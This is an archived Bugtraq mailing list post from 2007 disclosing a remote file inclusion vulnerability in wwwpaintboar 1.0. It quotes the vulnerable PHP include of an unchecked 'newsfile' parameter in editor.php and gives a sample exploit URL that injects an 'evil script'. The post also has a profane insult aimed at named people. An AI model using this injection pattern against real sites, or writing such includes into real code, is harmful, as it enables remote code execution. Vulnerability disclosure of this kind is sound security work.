Bugtraq mailing list archives
wwwpaintboar(newsfile) Remote File Inclusion Vulnerability
From: saw_xyz () yahoo com
Date: 9 Mar 2007 10:43:48 -0000
wwwpaintboar(newsfile) Remote File Inclusion Vulnerability ----------------------------------------------------------- Version : 1.0 Website URL: http://phpforge.oirac.com/ ----------------------------------------------------------- Discoved by saw_xyz (sasan) [XIII Security Researcher] Gr33tZ t0 :Snake My Home : www.saw13.com fuck ahsyane st an davood [ashy member] ----------------------------------------------------------- Vulnerable codeZ is in editor.php in line 261 : <? include "$newsfile"; ?> ----------------------------------------------------------- Ex: http://127.0.0.1/%5bpatch%5d/editor.php?newsfile=%5bevil script]
Current thread:
- wwwpaintboar(newsfile) Remote File Inclusion Vulnerability saw_xyz (Mar 09)